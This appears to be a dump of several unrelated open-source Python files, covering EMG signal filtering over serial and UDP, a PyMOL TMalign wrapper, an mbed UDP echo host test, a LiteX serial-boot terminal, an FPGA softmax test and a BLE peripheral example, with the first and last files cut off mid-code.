m3[:win] = m3[:win] - np.mean(m3[:win])
m4[:win] = m4[:win] - np.mean(m4[:win])
def remove_artifacts():
global m1p,m2p,m3p,m4p,o1p,o2p,o3p,o4p,m1,m2,m3,m4,o1,o2,o3,o4,win
m1p = remove_powerline(m1[:win])
m1p = lfilter(bemg, aemg, m1p)
m1p = medfilt(m1p, 11)
m2p = remove_powerline(m2[:win])
m2p = lfilter(bemg, aemg, m2p)
m2p = medfilt(m2p, 11)
m3p = remove_powerline(m3[:win])
m3p = lfilter(bemg, aemg, m3p)
m3p = medfilt(m3p, 11)
m4p = remove_powerline(m4[:win])
m4p = lfilter(bemg, aemg, m4p)
m4p = medfilt(m4p, 11)
def remove_powerline(x):
y = lfilter(b1, a1, x)
y = lfilter(b2, a2, y)
return y
def udp_receive():
global read
UDP_RX_IP_ADDRESS = "127.0.0.1"
UDP_RX_PORT_NO = 6790
ss = socket.socket(socket.AF_INET , socket.SOCK_DGRAM)
ss.bind((UDP_RX_IP_ADDRESS,UDP_RX_PORT_NO))
threadRun = True
while threadRun:
data , addr = ss.recvfrom(1024)
if data:
print "Message from Thread:" , data
if data == '1':
ser.write("1")
elif data == '2':
ser.write("2")
elif data == '0':
ser.write("2")
threadRun = False
UDP_IP_ADDRESS = "127.0.0.1"
UDP_PORT_NO = 6789
thr1 = threading.Thread(target=udp_receive, args=())
thr1.start()
ser = serial.Serial('/dev/ttyACM0', 2000000, timeout=None, xonxoff=False, rtscts=False, dsrdtr=False)
cs = socket.socket(socket.AF_INET , socket.SOCK_DGRAM)
win = 100
fs = 1000
whp = 30.0/fs
Q = 30
strm = 0
cnt = 0
eda = []
m1 = []
m2 = []
m3 = []
m4 = []
o1 = []
o2 = []
o3 = []
o4 = []
m1p = np.zeros(win)
m2p = np.zeros(win)
m3p = np.zeros(win)
m4p = np.zeros(win)
o1p = np.zeros(win)
o2p = np.zeros(win)
o3p = np.zeros(win)
o4p = np.zeros(win)
b1, a1 = iirnotch(60*2/fs, Q)
b2, a2 = iirnotch(60*4/fs, Q)
bemg, aemg = butter(3, whp, btype='high', analog=True)
if(writeToFile):
ofile = open('test1_Smile_3.csv', "wb")
writer = csv.writer(ofile, delimiter=' ', quotechar='"', quoting=csv.QUOTE_NONE , escapechar='\n')
while read:
data = ser.readline()
if data:
#if(writeToFile):
#writer.writerow([data])
strSample = str(data).split(',')
strm = strm + 1
eda.append(int(strSample[2]))
m1.append(int(strSample[3]))
m2.append(int(strSample[4]))
m3.append(int(strSample[9]))
m4.append(int(strSample[10]))
o1.append(int(strSample[5]))
o2.append(int(strSample[6]))
o3.append(int(strSample[7]))
o4.append(int(strSample[8]))
if strm == 2*win:
m1 = m1[win:]
m2 = m2[win:]
m3 = m3[win:]
m4 = m4[win:]
o1 = o1[win:]
o2 = o2[win:]
o3 = o3[win:]
o4 = o4[win:]
strm = win
sp = process()
writer.writerow(str(sp))
#cs.sendto(process(), (UDP_IP_ADDRESS,UDP_PORT_NO))
|
tmalign.py
|
'''
(c) 2011-2012 Thomas Holder, MPI for Developmental Biology
'''
from __future__ import print_function
__author__ = 'Thomas Holder'
__version__ = '1.1'
__license__ = 'BSD-2-Clause'
from pymol import cmd, CmdException
def save_pdb_without_ter(filename, selection, **kwargs):
'''
DESCRIPTION
Save PDB file without TER records. External applications like TMalign and
DynDom stop reading PDB files at TER records, which might be undesired in
case of missing loops.
'''
v = cmd.get_setting_boolean('pdb_use_ter_records')
if v: cmd.unset('pdb_use_ter_records')
cmd.save(filename, selection, **kwargs)
if v: cmd.set('pdb_use_ter_records')
def alignwithanymethod(mobile, target, methods='align super cealign tmalign',
async=1, quiet=1):
'''
DESCRIPTION
Align copies of mobile to target with several alignment methods
ARGUMENTS
mobile = string: atom selection
target = string: atom selection
methods = string: space separated list of PyMOL commands which take
arguments "mobile" and "target" (in any order) {default: align super
cealign tmalign}
'''
import threading
import time
methods = methods.split()
async, quiet = int(async), int(quiet)
mobile_obj = cmd.get_object_list('first (' + mobile + ')')[0]
def myalign(method):
newmobile = cmd.get_unused_name(mobile_obj + '_' + method)
cmd.create(newmobile, mobile_obj)
start = time.time()
cmd.do('%s mobile=%s in %s, target=%s' % (method, newmobile, mobile, target))
if not quiet:
print('Finished: %s (%.2f sec)' % (method, time.time() - start))
for method in methods:
if async:
t = threading.Thread(target=myalign, args=(method,))
t.setDaemon(1)
t.start()
else:
myalign(method)
def tmalign(mobile, target, args='', exe='~/bin/TMalign', ter=0, transform=1, object=None, quiet=0):
'''
DESCRIPTION
TMalign wrapper
Reference: Y. Zhang and J. Skolnick, Nucl. Acids Res. 2005 33, 2302-9
http://zhanglab.ccmb.med.umich.edu/TM-align/
USAGE
tmalign mobile, target [, args [, exe ]]
ARGUMENTS
mobile, target = string: atom selections
args = string: Extra arguments like -d0 5 -L 100
exe = string: Path to TMalign executable {default: TMalign}
ter = 0/1: If ter=0, then ignore chain breaks because TMalign will stop
at first TER record {default: 0}
SEE ALSO
tmscore, mmalign
'''
import subprocess, tempfile, os, re
ter, quiet = int(ter), int(quiet)
mobile_filename = tempfile.mktemp('.pdb', 'mobile')
target_filename = tempfile.mktemp('.pdb', 'target')
matrix_filename = tempfile.mktemp('.txt', 'matrix')
mobile_ca_sele = '(%s) and (not hetatm) and name CA and alt +A' % (mobile)
target_ca_sele = '(%s) and (not hetatm) and name CA and alt +A' % (target)
if ter:
save = cmd.save
else:
save = save_pdb_without_ter
save(mobile_filename, mobile_ca_sele)
save(target_filename, target_ca_sele)
exe = cmd.exp_path(exe)
args = [exe, mobile_filename, target_filename, '-m', matrix_filename] + args.split()
try:
process = subprocess.Popen(args, stdout=subprocess.PIPE)
lines = process.stdout.readlines()
except OSError:
print('Cannot execute "%s", please provide full path to TMscore or TMalign executable' % (exe))
raise CmdException
finally:
os.remove(mobile_filename)
os.remove(target_filename)
# TMalign >= 2012/04/17
if os.path.exists(matrix_filename):
lines += open(matrix_filename).readlines()
os.remove(matrix_filename)
r = None
re_score = re.compile(r'TM-score\s*=\s*(\d*\.\d*)')
rowcount = 0
matrix = []
line_it = iter(lines)
alignment = []
for line in line_it:
if 4 >= rowcount > 0:
if rowcount >= 2:
a = list(map(float, line.split()))
matrix.extend(a[2:5])
matrix.append(a[1])
rowcount += 1
elif line.lower().startswith(' -------- rotation matrix'):
rowcount = 1
elif line.startswith('(":" denotes'):
alignment = [line_it.next().rstrip() for i in range(3)]
else:
match = re_score.search(line)
if match is not None:
r = float(match.group(1))
if not quiet:
print(line.rstrip())
if not quiet:
for i in range(0, len(alignment[0])-1, 78):
for line in alignment:
print(line[i:i+78])
print('')
assert len(matrix) == 3*4
matrix.extend([0,0,0,1])
if int(transform):
cmd.transform_selection('byobject (%s)' % (mobile), matrix, homogenous=1)
# alignment object
if object is not None:
mobile_idx, target_idx = [], []
space = {'mobile_idx': mobile_idx, 'target_idx': target_idx}
cmd.iterate(mobile_ca_sele, 'mobile_idx.append("%s`%d" % (model, index))', space=space)
cmd.iterate(target_ca_sele, 'target_idx.append("%s`%d" % (model, index))', space=space)
for i, aa in enumerate(alignment[0]):
if aa == '-':
mobile_idx.insert(i, None)
for i, aa in enumerate(alignment[2]):
if aa == '-':
target_idx.insert(i, None)
if (len(mobile_idx) == len(target_idx) == len(alignment[2])):
cmd.rms_cur(
' '.join(idx for (idx, m) in zip(mobile_idx, alignment[1]) if m in ':.'),
' '.join(idx for (idx, m) in zip(target_idx, alignment[1]) if m in ':.'),
cycles=0, matchmaker=4, object=object)
else:
print('Could not load alignment object')
if not quiet and r is not None:
print('Found in output TM-score = %.4f' % (r))
return r
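# Example invocation from the PyMOL command line (hypothetical selections and
# executable path; the return value is the TM-score parsed from the output):
#   tmalign chain A and polymer, chain B and polymer, exe=/usr/local/bin/TMalign, object=aln_tm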
def tmscore(mobile, target, args='', exe='~/bin/TMscore', quiet=0, **kwargs):
'''
DESCRIPTION
TMscore wrapper
Reference: Yang Zhang and Jeffrey Skolnick, Proteins 2004 57: 702-710
http://zhanglab.ccmb.med.umich.edu/TM-score/
ARGUMENTS
mobile, target = string: atom selections
args = string: Extra arguments like -d 5
exe = string: Path to TMscore executable {default: TMscore}
ter = 0/1: If ter=0, then ignore chain breaks because TMscore will stop
at first TER record {default: 0}
SEE ALSO
tmalign, mmalign
'''
kwargs.pop('_self', None)
return tmalign(mobile, target, args, exe, quiet=quiet, **kwargs)
def mmalign(mobile, target, args='', exe='~/bin/MMalign', ter=0, transform=1, quiet=0):
'''
DESCRIPTION
MMalign wrapper
Reference: S. Mukherjee and Y. Zhang, Nucleic Acids Research 2009; 37: e83
http://zhanglab.ccmb.med.umich.edu/MM-align/
SEE ALSO
tmalign, tmscore
'''
return tmalign(mobile, target, args, exe, ter, transform, quiet=quiet)
# pymol commands
cmd.extend('alignwithanymethod', alignwithanymethod)
cmd.extend('tmalign', tmalign)
cmd.extend('tmscore', tmscore)
cmd.extend('mmalign', mmalign)
# autocompletion
cmd.auto_arg[0].update({
'tmalign': cmd.auto_arg[0]['align'],
'tmscore': cmd.auto_arg[0]['align'],
'mmalign': cmd.auto_arg[0]['align'],
})
cmd.auto_arg[1].update({
'tmalign': cmd.auto_arg[1]['align'],
'tmscore': cmd.auto_arg[1]['align'],
'mmalign': cmd.auto_arg[1]['align'],
})
|
udp_echo_client.py
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import socket
from sys import stdout
from threading import Thread
from SocketServer import BaseRequestHandler, UDPServer
from mbed_host_tests import BaseHostTest, event_callback
class UDPEchoClientHandler(BaseRequestHandler):
def handle(self):
""" UDP packet handler. Echoes data back to sender's address.
"""
data, sock = self.request
print ('HOST: UDPEchoClientHandler: Rx: \n%s\n' % data)
sock.sendto(data, self.client_address)
class UDPEchoClientTest(BaseHostTest):
def __init__(self):
"""
Initialise test parameters.
:return:
"""
BaseHostTest.__init__(self)
self.SERVER_IP = None # Will be determined after knowing the target IP
self.SERVER_PORT = 0 # Let the OS choose an arbitrary port
self.server = None
self.server_thread = None
self.target_ip = None
@staticmethod
def find_interface_to_target_addr(target_ip):
"""
Finds the IP address of the interface through which the host is connected to the target.
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_ip, 0)) # Target IP, any port
except socket.error:
s.connect((target_ip, 8000)) # Target IP, 'random' port
ip = s.getsockname()[0]
s.close()
return ip
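# Illustrative example (addresses are placeholders): if the target reports
# 192.168.1.50, connecting a UDP socket to it and reading getsockname()
# yields the host-side interface address, e.g. "192.168.1.10".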
def setup_udp_server(self):
"""
sets up a UDP server for target to connect and send test data.
:return:
"""
# !NOTE: There should be a mechanism to assert in the host test
if self.SERVER_IP is None:
self.log("setup_udp_server() called before determining server IP!")
self.notify_complete(False)
# Returning none will suppress host test from printing success code
self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler)
ip, port = self.server.server_address
self.SERVER_PORT = port
self.server.allow_reuse_address = True
self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT))
self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,))
self.server_thread.start()
@staticmethod
def server_thread_func(this):
"""
Thread function to run the UDP server forever.
:param this:
:return:
"""
this.server.serve_forever()
@event_callback("target_ip")
def _callback_target_ip(self, key, value, timestamp):
"""
Callback to handle reception of target's IP address.
:param key:
:param value:
:param timestamp:
:return:
"""
self.target_ip = value
self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip)
self.setup_udp_server()
@event_callback("host_ip")
def _callback_host_ip(self, key, value, timestamp):
"""
Callback for request for host IP Addr
"""
self.send_kv("host_ip", self.SERVER_IP)
@event_callback("host_port")
def _callback_host_port(self, key, value, timestamp):
"""
Callback for request for host port
"""
self.send_kv("host_port", self.SERVER_PORT)
def teardown(self):
if self.server:
self.server.shutdown()
self.server_thread.join()
|
litex_term.py
|
#!/usr/bin/env python3
# This file is Copyright (c) 2015-2019 Florent Kermarrec <florent@enjoy-digital.fr>
# This file is Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# This file is Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# License: BSD
import sys
import signal
import os
import time
import serial
import threading
import argparse
import json
if sys.platform == "win32":
import msvcrt
class Console:
def configure(self):
pass
def unconfigure(self):
pass
def getkey(self):
return msvcrt.getch()
else:
import termios
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
self.default_settings = termios.tcgetattr(self.fd)
def configure(self):
settings = termios.tcgetattr(self.fd)
settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
settings[6][termios.VMIN] = 1
settings[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, settings)
def unconfigure(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
def getkey(self):
return os.read(self.fd, 1)
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 251
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_load_no_crc = b"\x03"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
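# Serial-flash-loader handshake as implemented below: the device emits
# sfl_magic_req, the host answers with sfl_magic_ack, streams each memory
# region as SFLFrames (sfl_cmd_load or sfl_cmd_load_no_crc), then sends
# sfl_cmd_jump with the boot address; the device acknowledges every frame
# with one of the reply bytes above.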
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
crc = 0
for d in l:
crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
return crc & 0xffff
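# Sanity check: with this table (polynomial 0x1021) and a zero initial value the
# routine matches CRC-16/XMODEM, so crc16(b"123456789") should give 0x31C3.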
class SFLFrame:
def __init__(self):
self.cmd = bytes()
self.payload = bytes()
def compute_crc(self):
return crc16(self.cmd + self.payload)
def encode(self):
packet = bytes([len(self.payload)])
packet += self.compute_crc().to_bytes(2, "big")
packet += self.cmd
packet += self.payload
return packet
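# Wire format produced by encode(): one payload-length byte, two CRC bytes
# (big endian), the command byte, then the payload itself (at most
# sfl_payload_length bytes).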
class LiteXTerm:
def __init__(self, serial_boot, kernel_image, kernel_address, json_images, no_crc):
self.serial_boot = serial_boot
assert not (kernel_image is not None and json_images is not None)
self.mem_regions = {}
if kernel_image is not None:
self.mem_regions = {kernel_image: kernel_address}
self.boot_address = kernel_address
if json_images is not None:
f = open(json_images, "r")
self.mem_regions.update(json.load(f))
self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
f.close()
self.no_crc = no_crc
self.reader_alive = False
self.writer_alive = False
self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
self.magic_detect_buffer = bytes(len(sfl_magic_req))
self.console = Console()
signal.signal(signal.SIGINT, self.sigint)
self.sigint_time_last = 0
def open(self, port, baudrate):
if hasattr(self, "port"):
return
self.port = serial.serial_for_url(port, baudrate)
def close(self):
if not hasattr(self, "port"):
return
self.port.close()
del self.port
def sigint(self, sig, frame):
self.port.write(b"\x03")
sigint_time_current = time.time()
# Exit term if 2 CTRL-C pressed in less than 0.5s.
if (sigint_time_current - self.sigint_time_last < 0.5):
self.console.unconfigure()
self.close()
sys.exit()
else:
self.sigint_time_last = sigint_time_current
def send_frame(self, frame):
retry = 1
while retry:
self.port.write(frame.encode())
if not self.no_crc:
# Get the reply from the device
reply = self.port.read()
if reply == sfl_ack_success:
retry = 0
elif reply == sfl_ack_crcerror:
retry = 1
else:
print("[LXTERM] Got unknown reply '{}' from the device, aborting.".format(reply))
return 0
else:
retry = 0
return 1
def upload(self, filename, address):
with open(filename, "rb") as f:
data = f.read()
print("[LXTERM] Uploading {} to 0x{:08x} ({} bytes)...".format(filename, address, len(data)))
current_address = address
position = 0
length = len(data)
start = time.time()
while len(data):
sys.stdout.write("|{}>{}| {}%\r".format('=' * (20*position//length),
' ' * (20-20*position//length),
100*position//length))
sys.stdout.flush()
frame = SFLFrame()
frame_data = data[:sfl_payload_length]
frame.cmd = sfl_cmd_load if not self.no_crc else sfl_cmd_load_no_crc
frame.payload = current_address.to_bytes(4, "big")
frame.payload += frame_data
if self.send_frame(frame) == 0:
return
current_address += len(frame_data)
position += len(frame_data)
try:
data = data[sfl_payload_length:]
except:
data = []
end = time.time()
elapsed = end - start
print("[LXTERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
return length
def boot(self):
print("[LXTERM] Booting the device.")
frame = SFLFrame()
frame.cmd = sfl_cmd_jump
frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
self.send_frame(frame)
def detect_prompt(self, data):
if len(data):
self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
return self.prompt_detect_buffer == sfl_prompt_req
else:
return False
def answer_prompt(self):
print("[LXTERM] Received serial boot prompt from the device.")
self.port.write(sfl_prompt_ack)
def detect_magic(self, data):
if len(data):
self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
return self.magic_detect_buffer == sfl_magic_req
else:
return False
def answer_magic(self):
print("[LXTERM] Received firmware download request from the device.")
if(len(self.mem_regions)):
self.port.write(sfl_magic_ack)
for filename, base in self.mem_regions.items():
self.upload(filename, int(base, 16))
self.boot()
print("[LXTERM] Done.");
def reader(self):
try:
while self.reader_alive:
c = self.port.read()
sys.stdout.buffer.write(c)
sys.stdout.flush()
if len(self.mem_regions):
if self.serial_boot and self.detect_prompt(c):
self.answer_prompt()
if self.detect_magic(c):
self.answer_magic()
except serial.SerialException:
self.reader_alive = False
self.console.unconfigure()
raise
def start_reader(self):
self.reader_alive = True
self.reader_thread = threading.Thread(target=self.reader)
self.reader_thread.setDaemon(True)
self.reader_thread.start()
def stop_reader(self):
self.reader_alive = False
self.reader_thread.join()
def writer(self):
try:
while self.writer_alive:
b = self.console.getkey()
if b == b"\x03":
self.stop()
elif b == b"\n":
self.port.write(b"\x0a")
else:
self.port.write(b)
except:
self.writer_alive = False
self.console.unconfigure()
raise
def start_writer(self):
self.writer_alive = True
self.writer_thread = threading.Thread(target=self.writer)
self.writer_thread.setDaemon(True)
self.writer_thread.start()
def stop_writer(self):
self.writer_alive = False
self.writer_thread.join()
def start(self):
print("[LXTERM] Starting....")
self.start_reader()
self.start_writer()
def stop(self):
self.reader_alive = False
self.writer_alive = False
def join(self, writer_only=False):
self.writer_thread.join()
if not writer_only:
self.reader_thread.join()
def _get_args():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="serial port")
parser.add_argument("--speed", default=115200, help="serial baudrate")
parser.add_argument("--serial-boot", default=False, action='store_true',
help="automatically initiate serial boot")
parser.add_argument("--kernel", default=None, help="kernel image")
parser.add_argument("--kernel-adr", default="0x40000000", help="kernel address")
parser.add_argument("--images", default=None, help="json description of the images to load to memory")
parser.add_argument("--no-crc", default=False, action='store_true', help="disable CRC check (speedup serialboot)")
return parser.parse_args()
def main():
args = _get_args()
term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images, args.no_crc)
term.open(args.port, int(float(args.speed)))
term.console.configure()
term.start()
term.join(True)
if __name__ == "__main__":
main()
|
test_softmax_fpga.py
|
# Simple test for softmax for FPGA
# NOTE: for the time being it supports only the last axis
# TODO: add more tests
from dace.transformation.interstate import FPGATransformSDFG, InlineSDFG
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from daceml.pytorch import DaceModule, dace_module
import argparse
import pytest
from multiprocessing import Process, Queue
import dace
class Model(nn.Module):
def __init__(self, axis):
super(Model, self).__init__()
self.axis = axis
def forward(self, x):
x = F.softmax(x, dim=self.axis)
return x
def run(data_shape: tuple, axis, queue=None):
ptmodel = Model(axis)
x = torch.rand(data_shape, )
dace_model = DaceModule(ptmodel, auto_optimize=False)
import daceml.onnx as donnx
with dace.library.change_default(donnx.ONNXSoftmax, "pure"):
dace_output = dace_model(x)
torch_output = ptmodel(x)
assert np.allclose(torch_output.detach().numpy(), dace_output, atol=1e-06)
##########################################
# Transform to FPGA
def TransformToFPGA(dace_module):
'''
Transforms the given module to run on FPGA.
This includes library node expansions.
:param dace_module:
:return:
'''
sdfg = dace_module.sdfg
sdfg.apply_transformations([FPGATransformSDFG, InlineSDFG])
sdfg.expand_library_nodes()
sdfg.apply_transformations_repeated([InlineSDFG])
# Reset the SDFG
dace_model.reset_sdfg()
# Append transformation hook
dace_model.append_post_onnx_hook("TransformToFPGA", TransformToFPGA)
# Execute Module with FPGA expansion
with dace.library.change_default(donnx.ONNXSoftmax, "fpga"):
dace_output_fpga = dace_model(torch.clone(x)).numpy()
diff = np.linalg.norm(torch_output.detach().numpy() -
dace_output_fpga) / dace_output_fpga.size
print("Difference: ", diff)
if queue is not None:
# we are testing
queue.put(diff)
else:
if diff > 1e-6:
import pdb
pdb.set_trace()
assert (False)
del dace_model, ptmodel, x
@pytest.mark.fpga
def test():
data_shape = (1000, 10, 10)
# Multiprocessing is needed for testing, otherwise the Intel compiler messes up the threads
queue = Queue()
p = Process(target=run, args=(data_shape, 2, queue))
p.start()
p.join()
assert (queue.get() < 1e-6)
#TODO: add more tests
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("W",
type=int,
nargs="?",
default=1,
help="Vectorization width")
parser.add_argument("-test",
action="store_true",
default=False,
help="Perform tests (USE ONLY WITH EMULATION)")
args = vars(parser.parse_args())
vec_width = args["W"]
t = args["test"]
if t:
test()
else:
data_shape = (1000, 10, 10)
run(data_shape, 2)
|
peripheral.py
|
"""
This example exhibits some of the functionality of a peripheral BLE device,
such as reading, writing and notifying characteristics.
This peripheral can be used with one of the central examples running on a separate nordic device,
or can be run with the nRF Connect app to explore the contents of the service
"""
import atexit
import struct
import threading
import time
from blatann import BleDevice
from blatann.examples import example_utils, constants
from blatann.gap import advertising, smp, IoCapabilities
from blatann.waitables import GenericWaitable
logger = example_utils.setup_logger(level="DEBUG")
def on_connect(peer, event_args):
"""
Event callback for when a central device connects to us
:param peer: The peer that connected to us
:type peer: blatann.peer.Client
:param event_args: None
"""
if peer:
logger.info("Connected to peer")
else:
logger.warning("Connection timed out")
def on_disconnect(peer, event_args):
"""
Event callback for when the client disconnects from us (or when we disconnect from the client)
:param peer: The peer that disconnected
:type peer: blatann.peer.Client
:param event_args: The event args
:type event_args: blatann.event_args.DisconnectionEventArgs
"""
logger.info("Disconnected from peer, reason: {}".format(event_args.reason))
def on_hex_conversion_characteristic_write(characteristic, event_args):
"""
Event callback for when the client writes to the hex conversion characteristic.
This takes the data written, converts it to the hex representation, and updates the characteristic
with this new value. If the client is subscribed to the characteristic, the client will be notified.
:param characteristic: The hex conversion characteristic
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:param event_args: the event arguments
:type event_args: blatann.event_args.WriteEventArgs
"""
logger.info("Got characteristic write - characteristic: {}, data: 0x{}".format(characteristic.uuid,
str(event_args.value).encode("hex")))
new_value = "{}".format(str(event_args.value).encode("hex"))
characteristic.set_value(new_value[:characteristic.max_length], notify_client=True)
def on_gatts_subscription_state_changed(characteristic, event_args):
"""
Event callback for when a client subscribes or unsubscribes from a characteristic. This
is the equivalent to when a client writes to a CCCD descriptor on a characteristic.
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:type event_args: blatann.event_args.SubscriptionStateChangeEventArgs
"""
logger.info("Subscription state changed - characteristic: {}, state: {}".format(characteristic.uuid, event_args.subscription_state))
def on_time_char_read(characteristic, event_args):
"""
Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic.
This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic,
it is only updated when read/observed by an outside actor.
:param characteristic: the time characteristic
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:param event_args: None
"""
t = time.time()
ms = int((t * 1000) % 1000)
msg = "Time: {}.{:03}".format(time.strftime("%H:%M:%S", time.localtime(t)), ms)
characteristic.set_value(msg)
def on_client_pairing_complete(peer, event_args):
"""
Event callback for when the pairing process completes with the client
:param peer: the peer that completed pairing
:type peer: blatann.peer.Client
:param event_args: the event arguments
:type event_args: blatann.event_args.PairingCompleteEventArgs
"""
logger.info("Client Pairing complete, status: {}".format(event_args.status))
def on_passkey_display(peer, event_args):
"""
Event callback that is called when a passkey is required to be displayed to a user
for the pairing process.
:param peer: The peer the passkey is for
:type peer: blatann.peer.Client
:param event_args: The event args
:type event_args: blatann.event_args.PasskeyDisplayEventArgs
"""
logger.info("Passkey display: {}, match: {}".format(event_args.passkey, event_args.match_request))
class CountingCharacteristicThread(object):
"""
Thread which updates the counting characteristic and notifies
the client each time its updated.
This also demonstrates the notification queuing functionality--if a notification/indication
is already in progress, future notifications will be queued and sent out when the previous ones complete.
"""
def __init__(self, characteristic):
"""
:param characteristic: the counting characteristic
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
"""
self.current_value = 0
self._stop_event = threading.Event()
self._stopped = threading.Event()
self.characteristic = characteristic
self.characteristic.on_notify_complete.register(self._on_notify_complete)
self.thread = threading.Thread(target=self.run)
atexit.register(self.join)
self.thread.daemon = True
self.thread.start()
def join(self):
"""
Used to stop and join the thread
"""
self._stop_event.set()
self._stopped.wait(3)
def _on_notify_complete(self, characteristic, event_args):
"""
Event callback that is triggered when the notification finishes sending
:param characteristic: The characteristic the notification was on
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:param event_args: The event arguments
:type event_args: blatann.event_args.NotificationCompleteEventArgs
"""
logger.info("Notification Complete, id: {}, reason: {}".format(event_args.id, event_args.reason))
def run(self):
while not self._stop_event.is_set():
try:
if not self.characteristic.client_subscribed: # Do nothing until a client is subscribed
time.sleep(1)
continue
# Increment the value and pack it
self.current_value += 1
value = struct.pack("<I", self.current_value)
